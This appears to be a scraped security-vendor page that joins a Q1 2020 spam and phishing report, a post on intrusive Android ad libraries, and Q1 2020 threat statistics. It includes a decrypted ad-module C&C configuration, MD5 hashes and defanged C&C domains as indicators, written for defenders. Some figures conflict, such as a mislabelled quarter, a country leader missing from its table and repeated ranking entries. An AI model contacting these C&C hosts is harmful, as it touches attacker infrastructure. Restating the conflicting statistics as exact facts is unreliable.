!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Spam e-mail size, Q4 2019 – Q1 2020 (download)

Compared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.

Meanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100–200 KB) also posted growth (+2.70 p.p.). Their slice in Q1 2020 was 4.50%.

Malicious attachments in e-mail

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of Mail Anti-Virus triggerings, Q4 2019 – Q1 2020 (download)

In Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malicious attachments in mail traffic, Q1 2020 (download)

In Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malicious families in mail traffic, Q1 2020 (download)

As regards malware families, the most widespread this quarter was Trojan.Win32.Agentb (12.51%), with Exploit.MSOffice.CVE-2017-11882 (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and Worm.Win32.wbvb (4.65%) in third.

Countries targeted by malicious mailshots

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of Mail Anti-Virus triggerings by country, Q1 2020 (download)

First place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.

Statistics: phishing

In Q1 2020, the Anti-Phishing system prevented 119,115,577 attempts to redirect users to scam websites. The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.

Attack geography

The country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of phishing attacks, Q1 2020 (download)

In second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.

Country %* Venezuela 20.53% Brazil 14.95% Australia 13.71% Portugal 12.98% Algeria 12.12% France 11.71% Honduras 11.62% Greece 11.58% Myanmar 11.54% Tunisia 11.53%

* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky products Anti-Phishing component. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a social network, or the result of a malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

The largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of organizations affected by phishing attacks by category, Q1 2020 (download)

As for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.

Conclusion

Glancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on “standard” fake pages and in spam mailings.

The topic is also used extensively in fraudulent schemes offering compensation and material assistance.

It is highly likely that this type of fraud will become more frequent.

The average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.

Top of this quarter’s list of spam-source countries is Russia, with a share of 20.74%. Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.

2020. május 25.

Aggressive in-app advertising in Android

Recently, we’ve been noticing ever more dubious advertising libraries in popular apps on Google Play. The monetization methods used in such SDKs can pose a threat to users, yet they pull in more revenue for developers than whitelisted ad modules due to the greater number of views. In this post we will look into a few examples of suspicious-looking ad modules that we discovered in popular apps earlier this year.

One of the applications we researched was a popular app that allows users to ask questions anonymously. Integrated into the code of an earlier version of the app was the module com.haskfm.h5mob. Its task was to show intrusive advertising (in breach of the Google Play rules) when the user unlocked the phone.

Code for displaying ads when the screen is unlocked

In other words, the module can show ads whether the app is running or not. The ad can simply pop up on the main screen all on its own, causing a nuisance for the user. We passed our findings to the app developers, who promptly removed com.haskfm.h5mob. However, this module remains interesting from technical point of view.

In this application to receive advertising offers, the module connects to the C&C servers, whose addresses are encrypted in the app code.

Decrypting the C&C addresses

The C&C response contains the display parameters and the platforms used to receive ads.

{"status":1, "msg":"Success", "data":{"rqect":0, "ldfr":1, "tifr":1, "appintset":43200000, "swpa":1, "ssjp":1, "tcap":86400000, "ctoftime":3600000, "jtslist":[{"domain":"app.appsflyer.com","format":"&android_id={android_id}&advertising_id={gaid}"}, {"domain":"app.adjust.com","format":"&android_id={android_id}&gps_adid={gaid}"}, {"domain":"app.adjust.io","format":"&android_id={android_id}&gps_adid={gaid}"}, ……

The most interesting parameter here is appintset, which specifies the delay before displaying the first ad after installation of the app. In our example, it was set to 43.2 million milliseconds, or 12 hours. This delay makes it much harder for the user to find the culprit for all the ads that suddenly appear on the screen. Also, this technique is frequently used by cybercriminals to trick automatic protection mechanisms, such as sandboxes in app stores. The main parameters are followed by an extensive list of addresses of advertising providers with request parameters for receiving offers.

Earlier we detected a similar ad module in apps without a payload. For example, the code in the app com.android.ggtoolkit_tw_xd, which we detect as not-a-virus:AdWare.AndroidOS.Magic.a, contains the same features and is managed from the same C&C as the com.haskfm.h5mob module. However, this adware app has no graphical interface to speak of, is not displayed in the device’s app menu, and serves only to display intrusive ads as described above. It looks something like this: adware_in-app_video.mp4

While, as previously mentioned, the creators of the application described in the first example, promptly removed the ad module, not all Android developers are so conscientious. For example, the Cut – CutOut & Photo Background Editor app does not hesitate to treat users to a half-screen ad as soon as the smartphone is unlocked, regardless of whether the app is running or not.

Likewise the Fast Cleaner — Speed​Booster & Cleaner app.

In both apps, the library com.vision.lib handles the display of advertising.

Display of advertising

At the time of writing this article, the developers of both apps had not responded to our requests.

Note, however, that adware is not always about greed. Often, app developers are not versed in advertising SDKs and lack the necessary skills to test an integrated advertising library, and therefore may not fully understand what they are adding to their code. The danger for users here is that a dubious library could unexpectedly make its way into an app as part of a rank-and-file update. And it becomes extremely difficult to figure out which of a dozen recently updated apps is the source of intrusive advertising.

IOCs MD5

1eeda6306a2b12f78902a1bc0b7a7961 – com.android.ggtoolkit_tw_xd
134283b8efedc3d7244ba1b3a52e4a92  – com.xprodev.cutcam
3aba867b8b91c17531e58a9054657e10 – com.powerd.cleaner

С&C

ti.domainforlite[.]com/st/hg
uu.domainforlite[.]com

2020. május 20.

IT threat evolution Q1 2020. Statistics

These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.
  • A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.
  • Ransomware attacks were defeated on the computers of 178,922 unique users.
  • Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.
  • Kaspersky products for mobile devices detected:
    • 1,152,662 malicious installation packages
    • 42,115 installation packages for mobile banking trojans
    • 4339 installation packages for mobile ransomware trojans
Mobile threats Quarter events

Q1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals’ exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for €0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim’s knowledge.

Another interesting find this quarter was Cookiethief, a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim’s account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.

The third piece of malware that caught our attention this reporting quarter was trojan-Dropper.AndroidOS.Shopper.a. It is designed to help cybercriminals to leave fake reviews and drive up ratings on Google Play. The attackers’ goals here are obvious: to increase the changes of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.

Mobile threat statistics

In Q1 2020, Kaspersky’s mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of malicious installation packages detected, Q1 2019 – Q1 2020 (download)

Starting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.

Distribution of detected mobile apps by type

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 (download)

Of all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).

Potentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.

In third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1’s leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and Hqwar (8%) far behind.

It is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.

Top 20 mobile malware programs

Note that this malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware.

Verdict %* 1 DangerousObject.Multi.Generic 44.89 2 Trojan.AndroidOS.Boogr.gsh 9.09 3 DangerousObject.AndroidOS.GenericML 7.08 4 Trojan-Downloader.AndroidOS.Necro.d 4.52 5 Trojan.AndroidOS.Hiddapp.ch 2.73 6 Trojan-Downloader.AndroidOS.Helper.a 2.45 7 Trojan.AndroidOS.Handda.san 2.31 8 Trojan-Dropper.AndroidOS.Necro.z 2.30 9 Trojan.AndroidOS.Necro.a 2.19 10 Trojan-Downloader.AndroidOS.Necro.b 1.94 11 Trojan-Dropper.AndroidOS.Hqwar.gen 1.82 12 Trojan-Dropper.AndroidOS.Helper.l 1.50 13 Exploit.AndroidOS.Lotoor.be 1.46 14 Trojan-Dropper.AndroidOS.Lezok.p 1.46 15 Trojan-Banker.AndroidOS.Rotexy.e 1.43 16 Trojan-Dropper.AndroidOS.Penguin.e 1.42 17 Trojan-SMS.AndroidOS.Prizmes.a 1.39 18 Trojan.AndroidOS.Dvmap.a 1.24 19 Trojan.AndroidOS.Agent.rt 1.21 20 Trojan.AndroidOS.Vdloader.a 1.18

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked.

First place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected using cloud technology. They are triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7,08%) respectively. These verdicts are assigned to files that are recognized as malicious by our machine-learning systems.

In fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim’s name.

Trojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan’s payload can be other trojan programs or adware apps.

Sixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. Helper.a is tasked with downloading arbitrary code from the cybercriminals’ server and running it.

The verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.

Trojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.

Geography of mobile threats

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Map of infection attempts by mobile malware, Q1 2020 (download)

Top 10 countries by share of users attacked by mobile threats

Country* %** 1 Iran 39.56 2 Algeria 21.44 3 Bangladesh 18.58 4 Nigeria 15.58 5 Lebanon 15.28 6 Tunisia 14.94 7 Pakistan 13.99 8 Kuwait 13.91 9 Indonesia 13.81 10 Cuba 13.62

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country.

In Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.

Mobile banking trojans

During the reporting period, we detected 42,115 installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 – Q1 2020 (download)

Top 10 mobile banking trojans

  Verdict %* 1 Trojan-Banker.AndroidOS.Rotexy.e 13.11 2 Trojan-Banker.AndroidOS.Svpeng.q 10.25 3 Trojan-Banker.AndroidOS.Asacub.snt 7.64 4 Trojan-Banker.AndroidOS.Asacub.ce 6.31 5 Trojan-Banker.AndroidOS.Agent.eq 5.70 6 Trojan-Banker.AndroidOS.Anubis.san 4.68 7 Trojan-Banker.AndroidOS.Agent.ep 3.65 8 Trojan-Banker.AndroidOS.Asacub.a 3.50 9 Trojan-Banker.AndroidOS.Asacub.ar 3.00 10 Trojan-Banker.AndroidOS.Agent.cf 2.70

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats.

First and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).

Third, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile banking threats, Q1 2020 (download)

Top 10 countries by share of users attacked by mobile banking trojans

Country* %** 1 Japan 0.57 2 Spain 0.48 3 Italy 0.26 4 Bolivia 0.18 5 Russia 0.17 6 Turkey 0.13 7 Tajikistan 0.13 8 Brazil 0.11 9 Cuba 0.11 10 China 0.10

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000).
** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country.

In Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.

In second place came Spain (0.48%), where in more than half of all cases, we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.

Third place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.

It is worth saying a bit more about the Cebruser family. Its creators were among the first to exploit the coronavirus topic to spread the malware.

When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.

The malware is distributed under the Malware-as-a-Service model; its set of functions is standard for such threats, but with one interesting detail — the use of a step-counter for activation so as to bypass dynamic analysis tools (sandbox). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.

Mobile ransomware trojans

In Q2 2020, we detected 4,339 installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 – Q1 2020 (download)

Top 10 mobile ransomware trojans

Verdict %* 1 Trojan-Ransom.AndroidOS.Svpeng.aj 17.08 2 Trojan-Ransom.AndroidOS.Congur.e 12.70 3 Trojan-Ransom.AndroidOS.Small.as 11.41 4 Trojan-Ransom.AndroidOS.Rkor.k 9.88 5 Trojan-Ransom.AndroidOS.Small.as 7.32 6 Trojan-Ransom.AndroidOS.Small.o 4.79 7 Trojan-Ransom.AndroidOS.Svpeng.aj 3.62 8 Trojan-Ransom.AndroidOS.Svpeng.ah 3.55 9 Trojan-Ransom.AndroidOS.Congur.e 3.32 10 Trojan-Ransom.AndroidOS.Fusob.h 3.17

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans.

Over the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile ransomware trojans, Q1 2020 (download)

Top 10 countries by share of users attacked by mobile ransomware trojans:

Country* %** 1 USA 0.26 2 Kazakhstan 0.25 3 Iran 0.16 4 China 0.09 5 Saudi Arabia 0.08 6 Italy 0.03 7 Mexico 0.03 8 Canada 0.03 9 Indonesia 0.03 10 Switzerland 0.03

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000).
** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country.

The leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%)

Attacks on Apple macOS

In Q1 2020, we detected not only new versions of common threats, but one new backdoor family, whose first member was Backdoor.OSX.Capip.a. The malware’s operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.

Top 20 threats to macOS Verdict %* 1 Trojan-Downloader.OSX.Shlayer.a 19.27 2 AdWare.OSX.Pirrit.j 10.34 3 AdWare.OSX.Cimpli.k 6.69 4 AdWare.OSX.Ketin.h 6.27 5 AdWare.OSX.Pirrit.aa 5.75 6 AdWare.OSX.Pirrit.o 5.74 7 AdWare.OSX.Pirrit.x 5.18 8 AdWare.OSX.Spc.a 4.56 9 AdWare.OSX.Cimpli.f 4.25 10 AdWare.OSX.Bnodlero.t 4.08 11 AdWare.OSX.Bnodlero.x 3.74 12 Hoax.OSX.SuperClean.gen 3.71 13 AdWare.OSX.Cimpli.h 3.37 14 AdWare.OSX.Pirrit.v 3.30 15 AdWare.OSX.Amc.c 2.98 16 AdWare.OSX.MacSearch.d 2.85 17 RiskTool.OSX.Spigot.a 2.84 18 AdWare.OSX.Pirrit.s 2.80 19 AdWare.OSX.Ketin.d 2.76 20 AdWare.OSX.Bnodlero.aq 2.70

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked

The top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular, numerous adware apps from the Pirrit family.

Interestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation, scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.

Threat geography Country* %** 1 Spain 7.14 2 France 6.94 3 Italy 5.94 4 Canada 5.58 5 USA 5.49 6 Russia 5.10 7 India 4.88 8 Mexico 4.78 9 Brazil 4.65 10 Belgium 4.65

* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)
** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country.

The leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.

IoT attacks IoT threat statistics

In Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%.

SSH 18.9% Telnet 81.1%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020

It was a similar situation with control sessions: attackers often controlled infected traps via telnet.

SSH 39.62% Telnet 60.38%

Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020

Telnet-based attacks

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020 (download)

Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps.

Country* % China 13.04 Egypt 11.65 Brazil 11.33 Vietnam 7.38 Taiwan 6.18 Russia 4.38 Iran 3.96 India 3.14 Turkey 3.00 USA 2.57

 
For several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).

SSH-based attacks

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020 (download)

Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps.

Country* % China 14.87 Vietnam 11.58 USA 7.03 Egypt 6.82 Brazil 5.79 Russia 4.66 India 4.16 Germany 3.64 Thailand 3.44 France 2.83

In Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.

Threats loaded into honeypots Verdict %* Trojan-Downloader.Linux.NyaDrop.b 64.35 Backdoor.Linux.Mirai.b 16.75 Backdoor.Linux.Mirai.ba 6.47 Backdoor.Linux.Gafgyt.a 4.36 Backdoor.Linux.Gafgyt.bj 1.30 Trojan-Downloader.Shell.Agent.p 0.68 Backdoor.Linux.Mirai.c 0.64 Backdoor.Linux.Hajime.b 0.46 Backdoor.Linux.Mirai.h 0.40 Backdoor.Linux.Gafgyt.av 0.35

* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack.

In Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.

Financial threats Financial threat statistics

In Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by financial malware, Q1 2020 (download)

Attack geography

To assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of banking malware attacks, Q1 2020 (download)

Top 10 countries by share of attacked users

Country* %** 1 Uzbekistan 10.5 2 Tajikistan 6.9 3 Turkmenistan 5.5 4 Afghanistan 5.1 5 Yemen 3.1 6 Kazakhstan 3.0 7 Guatemala 2.8 8 Syria 2.4 9 Sudan 2.1 10 Kyrgyzstan 2.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

Top 10 banking malware families

